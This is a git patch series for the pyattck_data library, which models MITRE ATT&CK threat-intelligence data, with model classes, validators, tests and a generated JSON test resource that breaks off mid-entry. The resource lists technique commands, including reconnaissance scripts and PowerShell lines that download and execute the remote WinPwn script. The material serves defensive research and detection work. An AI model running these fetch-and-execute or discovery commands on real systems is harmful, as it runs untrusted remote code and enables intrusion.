field(factory=bool) + windows: bool = field(factory=bool) + linux: bool = field(factory=bool) + macos: bool = field(factory=bool) + tcp: bool = field(factory=bool) + http: bool = field(factory=bool) + http2: bool = field(factory=bool) + http3: bool = field(factory=bool) + dns: bool = field(factory=bool) + doh: bool = field(factory=bool) + icmp: bool = field(factory=bool) + ftp: bool = field(factory=bool) + imap: bool = field(factory=bool) + mapi: bool = field(factory=bool) + smb: bool = field(factory=bool) + ldap: bool = field(factory=bool) + key_exchange: bool = field(factory=bool) + stego: bool = field(factory=bool) + proxy_aware: bool = field(factory=bool) + domainfront: bool = field(factory=bool) + custom_profile: bool = field(factory=bool) + jitter: bool = field(factory=bool) + working_hours: bool = field(factory=bool) + kill_date: bool = field(factory=bool) + chaining: bool = field(factory=bool) + logging: bool = field(factory=bool) + in_wild: bool = field(factory=bool) + attck_mapping: bool = field(factory=bool) + dashboard: bool = field(factory=bool) + blog: AnyStr = field(factory=str) + c2_matrix_indicators: AnyStr = field(factory=str) + jarm: bool = field(factory=bool) + actively_maint: bool = field(factory=bool) + slack: bool = field(factory=bool) + slack_members: bool = field(factory=bool) + gh_issues: bool = field(factory=bool) + notes: AnyStr = field(factory=str) + + # used in mobile attack + x_mitre_old_attack_id: AnyStr = field(factory=str) + + # NOT used in mobile attack + x_mitre_attack_spec_version: SemVersion = field(factory=SemVersion) + x_mitre_modified_by_ref: Id = field(factory=Id) + x_mitre_domains: List[MitreDomain] = field(factory=list) + + def __attrs_post_init__(self): + if self.external_references: + return_list = [] + for item in self.external_references: + return_list.append(ExternalReferences(**item)) + self.external_references = return_list + + @property + def actors(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='intrusion-set' + ) + + @property + def techniques(self): + return self._get_relationship_objects( + parent_id=self.id, + parent_type='attack-pattern' + ) diff --git a/src/pyattck_data/models/types.py b/src/pyattck_data/models/types.py new file mode 100644 index 0000000..d84939c --- /dev/null +++ b/src/pyattck_data/models/types.py @@ -0,0 +1,165 @@ +import re +from pydantic import BaseModel + + +# https://ihateregex.io/expr/semver/ + +PATTERNS = { + 'semversion': { + 'pattern': "^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$", + 'examples': ['1.1.1', '0.1.2', '99.99.99'] + }, + 'types': { + 'pattern': None, + 'examples': ['relationship', 'x-mitre-matrix', 'identity', 'marking-definition', 'course-of-action', 'malware', 'tool', 'intrusion-set', 'x-mitre-data-source', 'x-mitre-data-component', 'x-mitre-tactic', 'attack-pattern', 'bundle'] + }, + 'reference': { + 'pattern': None, + 'examples': ['identity', 'marking-definition', 'course-of-action', 'malware', 'tool', 'intrusion-set', 'x-mitre-data-source', 'x-mitre-data-component', 'x-mitre-tactic', 'attack-pattern'] + }, + 'domains': { + 'pattern': None, + 'examples': ['mobile-attack', 'enterprise-attack'] + }, + 'platforms': { + 'pattern': None, + 'examples': ['Windows', 'Android', 'iOS', 'macOS', 'Azure AD', 'SaaS', 'Network', 'Google Workspace', 'PRE', 'Containers', 'IaaS', 'Linux', 'Office 365'] + }, + 'relationship': { + 'pattern': None, + 'examples': ['revoked-by', 'subtechnique-of', 'uses', 'detects', 'mitigates','related-to'] + } +} + + +REGEXS = { + 'semversion': re.compile(PATTERNS['semversion']['pattern']) +} + + +class BaseCustomType(str): + + @classmethod + def __get_validators__(cls): + # one or more validators may be yielded which will be called in the + # order to validate the input, each validator will receive as an input + # the value returned from the previous validator + yield cls.validate + + +class SemVersion(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + # simplified regex here for brevity, see the wikipedia link above + pattern=PATTERNS['semversion']['pattern'], + # some example postcodes + examples=PATTERNS['semversion']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + m = REGEXS['semversion'].fullmatch(v.upper()) + if not m: + raise ValueError('Invalid SemVersion format') + return cls(f'{m.group(1)} {m.group(2)}') + + def __repr__(self): + return f'SemVersion({super().__repr__()})' + + +class Id(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['types']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if '--' in v: + type,id = v.split('--') + else: + type = v + if type not in PATTERNS['types']['examples']: + raise ValueError('Invalid Id attribute.') + return cls(v) + + def __repr__(self): + return f'Id({super().__repr__()})' + + +class MitreDomain(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['domains']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if v not in PATTERNS['domains']['examples']: + raise ValueError('Invalid MitreDomain attribute.') + return cls(v) + + def __repr__(self): + return f'MitreDomain({super().__repr__()})' + + +class MitrePlatform(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['platforms']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if v not in PATTERNS['platforms']['examples']: + raise ValueError('Invalid MitrePlatform attribute.') + return cls(v) + + def __repr__(self): + return f'MitrePlatform({super().__repr__()})' + + +class MitreRelationship(BaseCustomType): + + @classmethod + def __modify_schema__(cls, field_schema): + # __modify_schema__ should mutate the dict it receives in place, + # the returned value will be ignored + field_schema.update( + examples=PATTERNS['relationship']['examples'], + ) + + @classmethod + def validate(cls, v): + if not isinstance(v, str): + raise TypeError('string required') + if v not in PATTERNS['relationship']['examples']: + raise ValueError('Invalid MitreRelationship attribute.') + return cls(v) + + def __repr__(self): + return f'MitreRelationship({super().__repr__()})' diff --git a/pyattck_data/pyattckdata.py b/src/pyattck_data/pyattckdata.py similarity index 100% rename from pyattck_data/pyattckdata.py rename to src/pyattck_data/pyattckdata.py index bade133..35981af 100644 --- a/pyattck_data/pyattckdata.py +++ b/src/pyattck_data/pyattckdata.py @@ -1,7 +1,7 @@ import json import os -from requests import request +from requests import request from attrs import asdict from .base import Base diff --git a/pyattck_data/services/__init__.py b/src/pyattck_data/services/__init__.py similarity index 100% rename from pyattck_data/services/__init__.py rename to src/pyattck_data/services/__init__.py diff --git a/pyattck_data/services/adversaryemulation.py b/src/pyattck_data/services/adversaryemulation.py similarity index 100% rename from pyattck_data/services/adversaryemulation.py rename to src/pyattck_data/services/adversaryemulation.py diff --git a/pyattck_data/services/aptthreattracking.py b/src/pyattck_data/services/aptthreattracking.py similarity index 99% rename from pyattck_data/services/aptthreattracking.py rename to src/pyattck_data/services/aptthreattracking.py index a802bb1..0c84e45 100644 --- a/pyattck_data/services/aptthreattracking.py +++ b/src/pyattck_data/services/aptthreattracking.py @@ -148,7 +148,7 @@ def __parse_data(self, country, dict_list): targets=target, operations=operations, description=description, - tools=tools, + external_tools=tools, links=links, attck_id=attck_id, comment=comment diff --git a/pyattck_data/services/atomicredteam.py b/src/pyattck_data/services/atomicredteam.py similarity index 100% rename from pyattck_data/services/atomicredteam.py rename to src/pyattck_data/services/atomicredteam.py diff --git a/pyattck_data/services/atomicthreatcoverage.py b/src/pyattck_data/services/atomicthreatcoverage.py similarity index 100% rename from pyattck_data/services/atomicthreatcoverage.py rename to src/pyattck_data/services/atomicthreatcoverage.py diff --git a/pyattck_data/services/attckdatasources.py b/src/pyattck_data/services/attckdatasources.py similarity index 100% rename from pyattck_data/services/attckdatasources.py rename to src/pyattck_data/services/attckdatasources.py diff --git a/pyattck_data/services/attckempire.py b/src/pyattck_data/services/attckempire.py similarity index 100% rename from pyattck_data/services/attckempire.py rename to src/pyattck_data/services/attckempire.py diff --git a/pyattck_data/services/blueteamlabs.py b/src/pyattck_data/services/blueteamlabs.py similarity index 100% rename from pyattck_data/services/blueteamlabs.py rename to src/pyattck_data/services/blueteamlabs.py diff --git a/pyattck_data/services/c2matrix.py b/src/pyattck_data/services/c2matrix.py similarity index 100% rename from pyattck_data/services/c2matrix.py rename to src/pyattck_data/services/c2matrix.py diff --git a/pyattck_data/services/elemental.py b/src/pyattck_data/services/elemental.py similarity index 100% rename from pyattck_data/services/elemental.py rename to src/pyattck_data/services/elemental.py diff --git a/pyattck_data/services/litmustest.py b/src/pyattck_data/services/litmustest.py similarity index 100% rename from pyattck_data/services/litmustest.py rename to src/pyattck_data/services/litmustest.py diff --git a/pyattck_data/services/macosattackdataset.py b/src/pyattck_data/services/macosattackdataset.py similarity index 100% rename from pyattck_data/services/macosattackdataset.py rename to src/pyattck_data/services/macosattackdataset.py diff --git a/pyattck_data/services/malwarearchaeology.py b/src/pyattck_data/services/malwarearchaeology.py similarity index 100% rename from pyattck_data/services/malwarearchaeology.py rename to src/pyattck_data/services/malwarearchaeology.py diff --git a/pyattck_data/services/newbeeattackdata.py b/src/pyattck_data/services/newbeeattackdata.py similarity index 100% rename from pyattck_data/services/newbeeattackdata.py rename to src/pyattck_data/services/newbeeattackdata.py diff --git a/pyattck_data/services/nsmattck.py b/src/pyattck_data/services/nsmattck.py similarity index 100% rename from pyattck_data/services/nsmattck.py rename to src/pyattck_data/services/nsmattck.py diff --git a/pyattck_data/services/osqueryattack.py b/src/pyattck_data/services/osqueryattack.py similarity index 100% rename from pyattck_data/services/osqueryattack.py rename to src/pyattck_data/services/osqueryattack.py diff --git a/pyattck_data/services/stockpile.py b/src/pyattck_data/services/stockpile.py similarity index 100% rename from pyattck_data/services/stockpile.py rename to src/pyattck_data/services/stockpile.py diff --git a/pyattck_data/services/sysmonhunter.py b/src/pyattck_data/services/sysmonhunter.py similarity index 100% rename from pyattck_data/services/sysmonhunter.py rename to src/pyattck_data/services/sysmonhunter.py diff --git a/pyattck_data/services/threathuntingbook.py b/src/pyattck_data/services/threathuntingbook.py similarity index 100% rename from pyattck_data/services/threathuntingbook.py rename to src/pyattck_data/services/threathuntingbook.py diff --git a/pyattck_data/services/threathuntingtables.py b/src/pyattck_data/services/threathuntingtables.py similarity index 100% rename from pyattck_data/services/threathuntingtables.py rename to src/pyattck_data/services/threathuntingtables.py diff --git a/tests/__init__.py b/tests/__init__.py new file mode 100644 index 0000000..c13c51f --- /dev/null +++ b/tests/__init__.py @@ -0,0 +1 @@ +"""Test suite for the pyattck_data package.""" diff --git a/tests/test_each_model.py b/tests/test_each_model.py new file mode 100644 index 0000000..22cc4df --- /dev/null +++ b/tests/test_each_model.py @@ -0,0 +1,53 @@ +from pyattck_data.models.attack import MitreAttck, TYPE_MAP +from pyattck_data.models.nist import NistControls, GeneratedNistControlMap, ControlObject, BaseRelationship + + +data = None + +import requests + +def test_each_model(): + default_config_data = { + "enterprise_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_enterprise_attck_v1.json", + "pre_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_pre_attck_v1.json", + "mobile_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_mobile_attck_v1.json", + "ics_attck_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_ics_attck_v1.json", + "nist_controls_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_nist_controls_v1.json", + "generated_nist_json": "https://swimlane-pyattck.s3.us-west-2.amazonaws.com/attck_to_nist_controls.json", + } + for key,val in default_config_data.items(): + response = requests.get(val).json() + skip = False + if key == 'nist_controls_json': + data = NistControls(**response) + elif key == 'generated_nist_json': + data = GeneratedNistControlMap(**{"data": response}) + skip = True + else: + data = MitreAttck(**response) + if not skip: + for item in response['objects']: + if item.get('type'): + if key == 'nist_controls_json': + if item['type'] == 'relationship': + try: + BaseRelationship(**item) + except TypeError as te: + print(item) + print(te) + assert False + else: + try: + ControlObject(**item) + except TypeError as te: + print(item) + print(te) + assert False + else: + if TYPE_MAP.get(item['type']): + try: + TYPE_MAP[item['type']](**item) + except TypeError as te: + print(item) + print(te) + assert False diff --git a/tests/test_generated_methods.py b/tests/test_generated_methods.py new file mode 100644 index 0000000..6758a40 --- /dev/null +++ b/tests/test_generated_methods.py @@ -0,0 +1,264 @@ +import json + +from pyattck_data.models.generated import GeneratedData + + +GENERATED_ATTCK_JSON = json.load(open("tests/resources/generated_attck_data.json")) + +SAMPLE_DATA = { + "country": "china", + "names": ["APT1"], + "targets": ["USA"], + "operations": ["Some overseas operation"], + "description": "my description", + "tools": ["PowerShell", "Python"], + "links": ["https://google.com"], + "attck_id": "T1009", + "comment": "Some comment", + "family": ["USA"], + "names": ["PowerShell", "Python"], + "links": ["https://google.com"], + "comments": "Some comment", + "technique_id": "T1009", + "source": "https://google.com", + "name": "", + "command": "shell ver", + "content": { + "Category": "T1033", + "Built-in Windows Command": "whoami /all /fo list", + "Cobalt Strike": "shell whoami /all /fo list", + "Metasploit": "getuid", + "Description": "Get current user information, SID, domain, groups the user belongs to, security privs of the user" + }, + "product": "Azure Sentinel", + "content": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + "name": "System Owner User Discovery", + "data": { + "title": "System Owner or User Discovery", + "id": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "status": "experimental", + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "EXECVE", + "a0": [ + "users", + "w", + "who" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin activity" + ], + "level": "low", + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "reference": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "c2_data": { + "name": "Alan", + "license": "Created Commons", + "price": "NA", + "github": "https://github.com/enkomio/AlanFramework", + "site": "", + "twitter": "@s4tan", + "evaluator": "@s4tan", + "date": "9/10/2021", + "version": "4", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET", + "implant": "C/Asm", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "All code is executed in memory" + } +} + +def test_add_actor_item(): + data = GeneratedData() + data.add_actor_item( + country=SAMPLE_DATA["country"], + names=SAMPLE_DATA["names"], + targets=SAMPLE_DATA["targets"], + operations=SAMPLE_DATA["operations"], + description=SAMPLE_DATA["description"], + tools=SAMPLE_DATA["tools"], + links=SAMPLE_DATA["links"], + attck_id=SAMPLE_DATA["attck_id"], + comment=SAMPLE_DATA["comment"] + ) + assert data.last_updated + assert data.actors + assert len(data.actors) == 1 + for actor in data.actors: + assert actor.attck_id == SAMPLE_DATA["attck_id"] + assert hasattr(actor, 'attck_id') + for key,val in SAMPLE_DATA.items(): + if hasattr(actor, key): + assert len(getattr(actor, key)) == len(val) + + +def test_add_tool_item(): + data = GeneratedData() + data.add_tool_item( + names=SAMPLE_DATA["names"], + comments=SAMPLE_DATA["comment"], + family=SAMPLE_DATA["family"], + links=SAMPLE_DATA["links"] + ) + assert data.last_updated + assert data.tools + assert len(data.tools) == 1 + for tool in data.tools: + for key,val in SAMPLE_DATA.items(): + if hasattr(tool, key): + assert len(getattr(tool, key)) == len(val) + +def test_add_command(): + data = GeneratedData() + data.add_command( + technique_id=SAMPLE_DATA["technique_id"], + source=SAMPLE_DATA["source"], + command=SAMPLE_DATA["command"], + name=SAMPLE_DATA["name"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.commands + for command in technique.commands: + assert command.command == SAMPLE_DATA["command"] + assert command.command in technique.command_list + assert command.source == SAMPLE_DATA["source"] + assert command.name == SAMPLE_DATA["name"] + +def test_add_dataset(): + data = GeneratedData() + data.add_dataset( + technique_id=SAMPLE_DATA["technique_id"], + content=SAMPLE_DATA["content"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.parsed_datasets + for dataset in technique.parsed_datasets: + assert dataset == SAMPLE_DATA["content"] + +def test_add_possible_queries(): + local_data = { + "content": "Sysmon| where EventID == 1 and (process_path contains \"whoami.exe\"or process_command_line contains \"whoami\"or file_directory contains \"useraccount get /ALL\"or process_path contains \"qwinsta.exe\"or process_path contains \"quser.exe\"or process_path contains \"systeminfo.exe\")", + } + data = GeneratedData() + data.add_possible_queries( + technique_id=SAMPLE_DATA["technique_id"], + product=SAMPLE_DATA["product"], + content=local_data["content"], + name=SAMPLE_DATA["name"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.queries + for query in technique.queries: + assert query.product == SAMPLE_DATA["product"] + assert query.name == SAMPLE_DATA["name"] + assert query.query == local_data["content"] + +def test_add_possible_detection(): + data = GeneratedData() + data.add_possible_detection( + technique_id=SAMPLE_DATA["technique_id"], + data=SAMPLE_DATA["data"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.possible_detections + assert technique.possible_detections[0] == SAMPLE_DATA["data"] + +def test_add_external_reference(): + data = GeneratedData() + data.add_external_reference( + technique_id=SAMPLE_DATA["technique_id"], + reference=SAMPLE_DATA["reference"] + ) + assert data.last_updated + assert data.techniques + assert len(data.techniques) == 1 + for technique in data.techniques: + assert technique.technique_id == SAMPLE_DATA["technique_id"] + assert technique.external_reference + assert technique.external_reference[0] == SAMPLE_DATA["reference"] + +def test_add_c2_data(): + data = GeneratedData() + data.add_c2_data(SAMPLE_DATA["c2_data"]) + assert data.last_updated + assert data.c2_data + assert len(data.c2_data) == 1 + for c2 in data.c2_data: + for key,val in SAMPLE_DATA["c2_data"].items(): + assert hasattr(c2, key) + assert getattr(c2, key) == val diff --git a/tests/test_main.py b/tests/test_main.py new file mode 100644 index 0000000..8e7e82d --- /dev/null +++ b/tests/test_main.py @@ -0,0 +1,17 @@ +"""Test cases for the __main__ module.""" +import pytest +from click.testing import CliRunner + +from pyattck_data import __main__ + + +@pytest.fixture +def runner() -> CliRunner: + """Fixture for invoking command-line interfaces.""" + return CliRunner() + + +def test_main_succeeds(runner: CliRunner) -> None: + """It exits with a status code of zero.""" + result = runner.invoke(__main__.main) + assert result.exit_code == 0 diff --git a/tests/test_models.py b/tests/test_models.py new file mode 100644 index 0000000..e28c081 --- /dev/null +++ b/tests/test_models.py @@ -0,0 +1,120 @@ +# -*- coding: utf-8 -*- +import requests + +from pyattck_data.models.attack import MitreAttck +from pyattck_data.models.generated import GeneratedData +from pyattck_data.models.nist import NistControls, GeneratedNistControlMap +from pyattck_data.models.malware import Malware +from pyattck_data.models.tool import Tool +from pyattck_data.models.actor import Actor +from pyattck_data.models.datacomponent import DataComponent +from pyattck_data.models.datasource import DataSource +from pyattck_data.models.mitigation import Mitigation +from pyattck_data.models.tactic import Tactic +from pyattck_data.models.technique import Technique + +ENTERPRISE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_enterprise_attck_v1.json").json() +PRE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_pre_attck_v1.json").json() +MOBILE_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_mobile_attck_v1.json").json() +ICS_ATTCK_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/merged_ics_attck_v1.json").json() +GENERATED_NIST_JSON = requests.get("https://swimlane-pyattck.s3.us-west-2.amazonaws.com/attck_to_nist_controls.json").json() +NIST_CONTROLS_JSON = requests.get("https://raw.githubusercontent.com/center-for-threat-informed-defense/attack-control-framework-mappings/main/frameworks/attack_10_1/nist800_53_r4/stix/nist800-53-r4-controls.json").json() + + + +ENTERPRISE_OBJ = MitreAttck(**ENTERPRISE_ATTCK_JSON) + + +def test_enterprise(): + assert MitreAttck(**ENTERPRISE_ATTCK_JSON) + +def test_ics(): + assert MitreAttck(**ICS_ATTCK_JSON) + +def test_mobile(): + assert MitreAttck(**MOBILE_ATTCK_JSON) + +def test_pre_attck(): + assert MitreAttck(**PRE_ATTCK_JSON) + +def test_nist_controls(): + assert NistControls(**NIST_CONTROLS_JSON) + +def test_controls(): + assert GeneratedNistControlMap(**{"data": GENERATED_NIST_JSON}) + +def test_actor(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'intrusion-set': + for malware in item.malwares: + assert isinstance(malware, Malware) + try: + if item.tools: + for tool in item.tools: + assert isinstance(tool, Tool) + except: + pass + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_datacomponent(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-data-component': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_datasource(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-data-source': + for technique in item.techniques: + assert isinstance(technique, Technique) + for component in item.data_components: + assert isinstance(component, DataComponent) + +def test_malware(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'malware': + for technique in item.techniques: + assert isinstance(technique, Technique) + for actor in item.actors: + assert isinstance(actor, Actor) + +def test_mitigation(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'course-of-action': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_tactic(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'x-mitre-tactic': + for technique in item.techniques: + assert isinstance(technique, Technique) + +def test_technique(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'attack-pattern': + for actor in item.actors: + assert isinstance(actor, Actor) + for component in item.data_components: + assert isinstance(component, DataComponent) + for source in item.data_sources: + assert isinstance(source, DataSource) + for malware in item.malwares: + assert isinstance(malware, Malware) + for mitigation in item.mitigations: + assert isinstance(mitigation, Mitigation) + for tactic in item.tactics: + assert isinstance(tactic, Tactic) + for technique in item.techniques: + assert isinstance(technique, Technique) + for tool in item.tools: + assert isinstance(tool, Tool) + +def test_tactic(): + for item in ENTERPRISE_OBJ.objects: + if item.type == 'tool': + for technique in item.techniques: + assert isinstance(technique, Technique) + for actor in item.actors: + assert isinstance(actor, Actor) diff --git a/tests/test_types.py b/tests/test_types.py new file mode 100644 index 0000000..cb72232 --- /dev/null +++ b/tests/test_types.py @@ -0,0 +1,63 @@ +# -*- coding: utf-8 -*- +import pytest + + +from pyattck_data.models.types import ( + Id, + MitreDomain, + MitrePlatform, + PATTERNS, + SemVersion +) + + +def test_id_type(): + for example in PATTERNS["types"]["examples"]: + assert Id().validate(example) + + with pytest.raises(ValueError) as excinfo: + Id().validate('asdefasdf') + assert "Invalid Id attribute" in str(excinfo.value) + + with pytest.raises(ValueError) as excinfo: + Id().validate('asdefasdf-') + assert "Invalid Id attribute" in str(excinfo.value) + + +def test_semversion_type(): + for example in PATTERNS["semversion"]["examples"]: + assert SemVersion().validate(example) + + with pytest.raises(ValueError) as excinfo: + SemVersion().validate('asdefasdf') + assert "Invalid SemVersion format" in str(excinfo.value) + + with pytest.raises(ValueError) as excinfo: + SemVersion().validate('0000') + assert "Invalid SemVersion format" in str(excinfo.value) + + +def test_mitre_domain_type(): + for example in PATTERNS["domains"]["examples"]: + assert MitreDomain().validate(example) + + with pytest.raises(ValueError) as excinfo: + MitreDomain().validate('asdefasdf') + assert "Invalid MitreDomain attribute" in str(excinfo.value) + + with pytest.raises(ValueError) as excinfo: + MitreDomain().validate('0000') + assert "Invalid MitreDomain attribute" in str(excinfo.value) + + +def test_mitre_platform_type(): + for example in PATTERNS["platforms"]["examples"]: + assert MitrePlatform().validate(example) + + with pytest.raises(ValueError) as excinfo: + MitrePlatform().validate('android') + assert "Invalid MitrePlatform attribute" in str(excinfo.value) + + with pytest.raises(ValueError) as excinfo: + MitrePlatform().validate('relationship') + assert "Invalid MitrePlatform attribute" in str(excinfo.value) From e5691492e9f1991c4a9f22908aa4a01326877ea5 Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 9 Jun 2022 13:53:49 -0500 Subject: [PATCH 2/4] dev: Adding test resource --- tests/resources/generated_attck_data.json | 224780 +++++++++++++++++++ 1 file changed, 224780 insertions(+) create mode 100644 tests/resources/generated_attck_data.json diff --git a/tests/resources/generated_attck_data.json b/tests/resources/generated_attck_data.json new file mode 100644 index 0000000..66a8c72 --- /dev/null +++ b/tests/resources/generated_attck_data.json @@ -0,0 +1,224780 @@ +{ + "last_updated": "2022-05-26 10:03:52.536173", + "techniques": [ + { + "technique_id": "T1082", + "command_list": [ + "ver", + "shell ver", + "set", + "shell set", + "get_env.rb", + "net config workstation\nnet config server", + "shell net config workstation\nshell net config server", + "systeminfo [/s COMPNAME] [/u DOMAIN\\user] [/p password]", + "systemprofiler tool if no access yet (victim browses to website)\nor\nshell systeminfo (if you already have a beacon)", + "sysinfo, run winenum, get_env.rb", + "systeminfo\nreg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum\n", + "system_profiler\nls -al /Applications\n", + "uname -a >> /tmp/T1082.txt\nif [ -f /etc/lsb-release ]; then cat /etc/lsb-release >> /tmp/T1082.txt; fi;\nif [ -f /etc/redhat-release ]; then cat /etc/redhat-release >> /tmp/T1082.txt; fi; \nif [ -f /etc/issue ]; then cat /etc/issue >> /tmp/T1082.txt; fi;\nuptime >> /tmp/T1082.txt\ncat /tmp/T1082.txt 2>/dev/null\n", + "if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i \"Droplet\\|HVM\\|VirtualBox\\|VMware\"; fi;\nif [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i \"Xen\\|Bochs\\|QEMU\"; fi;\nif [ -x \"$(command -v dmidecode)\" ]; then sudo dmidecode | grep -i \"microsoft\\|vmware\\|virtualbox\\|quemu\\|domu\"; fi;\nif [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i \"vmware\\|vbox\"; fi;\nif [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i \"vmware\\|vbox\\|qemu\\|virtual\"; fi;\nif [ -x \"$(command -v lspci)\" ]; then sudo lspci | grep -i \"vmware\\|virtualbox\"; fi;\nif [ -x \"$(command -v lscpu)\" ]; then sudo lscpu | grep -i \"Xen\\|KVM\\|Microsoft\"; fi;\n", + "sudo lsmod | grep -i \"vboxsf\\|vboxguest\"\nsudo lsmod | grep -i \"vmw_baloon\\|vmxnet\"\nsudo lsmod | grep -i \"xen-vbd\\|xen-vnif\"\nsudo lsmod | grep -i \"virtio_pci\\|virtio_net\"\nsudo lsmod | grep -i \"hv_vmbus\\|hv_blkvsc\\|hv_netvsc\\|hv_utils\\|hv_storvsc\"\n", + "hostname\n", + "REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\n", + "cscript PathToAtomicsFolder\\T1082\\src\\griffon_recon.vbs", + "set\n", + "env\n", + "csrutil status\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwinPEAS -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nitm4nprivesc -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\noldchecks -noninteractive -consoleoutput", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 